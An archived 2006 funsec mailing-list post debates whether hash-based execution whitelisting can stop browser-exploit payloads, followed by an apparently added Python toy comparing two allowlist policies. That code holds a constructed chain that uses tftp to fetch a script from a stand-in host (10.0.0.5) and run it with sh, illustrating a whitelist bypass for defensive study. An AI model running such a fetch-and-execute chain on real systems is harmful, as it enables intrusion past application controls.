funsec mailing list archives

Re: standards status in the industry - opinion?


From: Blue Boar <BlueBoar () thievco com>
Date: Sun, 08 Jan 2006 09:23:38 -0800

Nick FitzGerald wrote:
> So, you're saying that just because a bunch of morons designed something utterly brokenly (from a security perspective) from the outset _AND_ that much of the world "enjoys" the flexibility this approach has allowed (or is just too damned ill-informed or otherwise stupid to know any better), THAT informed security professionals (and others) should not try to get such gross stupidity fixed?

I'm not saying that you shouldn't try, just that you probably won't succeed. In my experience, you "can't" take away some feature people like.

> And this is somewhat secondary anyway, for most/all script-based browser exploits _still_ have to drop some or other identifiably "executable" code (be it a binary or a file-based script or a file-based macro or a file-based <whatever>) to do the bulk of the actual nastiness, and the whitelisting-based, integrity enforcement will _still_ stop the "payload" of the attack, even if their browser is vulnerable.

I believe you can simply string together whitelisted programs to do what you like. Things like tftp.exe and format.exe.

> With known virus scanning you have to hope like hell that either your virus scanner has a good enough, generic enough (without raising silly FPs) detection of the browser exploit and will stop it (or at least alert you things have gone pear-shaped) as the bad HTML/script is written to the local browser cache OR that it already detects whatever it is that is dropped/further executes, etc (which increasingly, it doesn't).

I wasn't even necessarily talking about vulnerabilities per se. I don't consider enabling viruses to be a vulnerability, really. Just a side-effect of a general purpose OS.


> Such a whitelisting approach then _mainly_ only leaves you vulnerable to arbitrary code execution through buffer overflows and the like and other forms of mitigation (reducing exposed services, developer education, improvements in compiler and runtime execution checks, DEP/NX/etc, and so on) are available to varying degrees for those.

But to your point, whitelisting executables still leaves you vulnerable to things like core worms, and you still have to have other security measures to deal with those problems.

                                                BB
_______________________________________________
Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
Note: funsec is a public and open mailing list.
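The two positions in the exchange above (hash-based execution whitelisting stops a dropped binary, but chaining already-whitelisted programs such as tftp.exe gets around it) can be made concrete with a toy policy engine. This is an added example, not code from either poster or from any real whitelisting product. Everything in it is constructed: the in-memory "filesystem", the Unix-style paths (sh and tftp stand in for the Windows binaries named in the thread), the dropped payload, and the host 10.0.0.5 in the constructed script. It compares an executable-only hash check against one that also hash-checks what an allowlisted interpreter is told to run.

```python
"""Toy execution-allowlist enforcer (constructed example for this thread)."""
import hashlib
from dataclasses import dataclass
from typing import Callable, Dict, List

# Constructed in-memory "filesystem" standing in for real binaries and files,
# so the example runs offline. All paths and contents are assumptions.
FILES: Dict[str, bytes] = {
    "/usr/bin/sh":   b"ELF sh stand-in",
    "/usr/bin/tftp": b"ELF tftp stand-in",
    "/home/user/.cache/drop.bin": b"ELF dropped binary payload",
    "/home/user/.cache/drop.sh":  b"#!/bin/sh\n/usr/bin/tftp -g -r stage2 10.0.0.5\n",
}


def file_hash(path: str) -> str:
    """SHA-256 of the constructed file contents (the 'integrity' in integrity enforcement)."""
    return hashlib.sha256(FILES[path]).hexdigest()


# Integrity allowlist: only these exact file contents may execute.
ALLOWED_HASHES = {file_hash("/usr/bin/sh"), file_hash("/usr/bin/tftp")}
# Allowlisted programs that will run whatever they are handed.
INTERPRETERS = {"/usr/bin/sh"}


@dataclass
class Decision:
    allowed: bool
    reason: str


def check_exec_only(argv: List[str]) -> Decision:
    """Policy 1: hash-check only the executable being launched."""
    exe = argv[0]
    if exe not in FILES:
        return Decision(False, f"{exe}: no such file")
    if file_hash(exe) not in ALLOWED_HASHES:
        return Decision(False, f"{exe}: hash not allowlisted")
    return Decision(True, f"{exe}: hash allowlisted")


def check_exec_and_scripts(argv: List[str]) -> Decision:
    """Policy 2: as policy 1, but an allowlisted interpreter may only run
    allowlisted script files and is refused inline code (-c)."""
    decision = check_exec_only(argv)
    if not decision.allowed:
        return decision
    if argv[0] in INTERPRETERS:
        for arg in argv[1:]:
            if arg == "-c":
                return Decision(False, f"{argv[0]}: inline code refused")
            if arg in FILES and file_hash(arg) not in ALLOWED_HASHES:
                return Decision(False, f"{arg}: script hash not allowlisted")
    return decision


def run_chain(policy: Callable[[List[str]], Decision],
              chain: List[List[str]]) -> List[bool]:
    """Evaluate each command of a chain under a policy; stop at the first block."""
    results: List[bool] = []
    for argv in chain:
        decision = policy(argv)
        results.append(decision.allowed)
        if not decision.allowed:
            break
    return results


# Constructed attack chains.
DROPPED_BINARY = [["/home/user/.cache/drop.bin"]]          # Nick's case: dropped payload
LOLBIN_CHAIN = [                                            # Blue Boar's case: allowlisted tools only
    ["/usr/bin/tftp", "-g", "-r", "drop.sh", "10.0.0.5"],   # allowlisted fetcher (constructed host)
    ["/usr/bin/sh", "/home/user/.cache/drop.sh"],           # allowlisted interpreter, foreign script
]

if __name__ == "__main__":
    for name, chain in (("dropped binary", DROPPED_BINARY), ("lolbin chain", LOLBIN_CHAIN)):
        for policy in (check_exec_only, check_exec_and_scripts):
            print(f"{name:15} {policy.__name__:25} {run_chain(policy, chain)}")
```

Under the executable-only policy the dropped binary is blocked (Nick's point holds) but the tftp-then-sh chain runs to completion (Blue Boar's point holds); only when the interpreter's script argument is itself subject to the hash check does the chain fail at its second step. Neither policy says anything about a memory-corruption exploit that never touches the filesystem, which is the residual risk the last quoted paragraph concedes.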
